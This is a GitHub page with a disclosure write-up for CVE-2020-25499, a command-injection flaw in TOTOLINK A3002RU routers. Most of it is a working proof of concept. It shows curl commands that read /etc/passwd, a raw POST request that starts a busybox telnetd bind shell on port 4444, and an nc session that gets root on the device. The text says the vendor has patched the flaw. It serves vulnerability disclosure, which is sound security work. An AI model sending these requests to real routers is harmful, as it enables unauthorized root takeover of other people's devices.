Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Vulnerabilities/RCE_TOTOLINK-A3002RU-V2
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
71 lines (56 sloc)
2.7 KB
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ================================================================================================================================================ | |
| TOTOLINK A3002RU-V2.0.0 B20190814.1034 allows authenticated remote | |
| users to modify the system's 'Run Command'. | |
| Also vulnerabilities is more dangerous when router uses remote management function | |
| through the public-facing IP address on the WAN port. | |
| Attackers can send prepared POST request to device during administrator | |
| session is active and also got rce, because in request doesn't requires any | |
| authenticated token or cookies. | |
| An attacker can use this functionality to execute arbitrary OS commands | |
| on the router. There is also possibility to get shell command with root priviledge on device. | |
| Administrator must login to administrator panel and go to | |
| Advanced Setup-> System->Run Command. | |
| There is possibility to run ping and traceroute but it is also possible | |
| to change it and run different os command. | |
| Or Attacker need to send the request to router during admin session. | |
| If You like to use curl: | |
| - Send command: | |
| curl -d "submit-url=%2Fsyscmd.htm&sysCmd=cat+/etc/passwd" -X POST http://192.168.1.1/boafrm/formSysCmd | |
| - Get response: | |
| curl http://192.168.1.1/syscmd.htm | |
| ... | |
| root:x:0:0:root:/:/bin/sh | |
| nobody:x:0:0:nobody:/:/dev/null | |
| ... | |
| On router is busybox module so if run command to get bind shell on port 4444: | |
| '/bin/busybox telnetd -l/bin/sh -p4444' | |
| ---------------------------------------------------------------------------- | |
| POST /boafrm/formSysCmd HTTP/1.1 | |
| Host: 192.168.1.1 | |
| Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 | |
| Accept-Language: en-US,en;q=0.5 | |
| Accept-Encoding: gzip, deflate | |
| Content-Type: application/x-www-form-urlencoded | |
| Content-Length: 44 | |
| Connection: close | |
| Upgrade-Insecure-Requests: 1 | |
| submit-url=%2Fsyscmd.htm&sysCmd=/bin/busybox+telnetd+-l/bin/sh+-p4444 | |
| ----------------------------------------------------------------------------- | |
| Will get open port 4444 which is listening for connections. | |
| So when connect to this port using nc will get a shell with | |
| root priviledge on router. | |
| ------------------------------ | |
| # nc 192.168.1.1 4444 | |
| ��echo $USER | |
| echo $USER | |
| root | |
| # cat /proc/version | |
| cat /proc/version | |
| Linux version 3.10.90 (admin@hasee1.hopeiot) (gcc version 4.4.7 (Realtek MSDK-4.4.7 Build 2001) ) #2201 Wed Aug 14 10:38:28 CST 2019 | |
| # | |
| ------------------------------ | |
| The producer and cve.mitre.org was announced 9.09.2020 and new version of firmware is available. | |
| The Producer confirm patched this voulnerability. | |
| https://www.totolink.net/home/index/newsss/id/196.html | |
| CVE-2020-25499 | |
| ================================================================================================================================================ |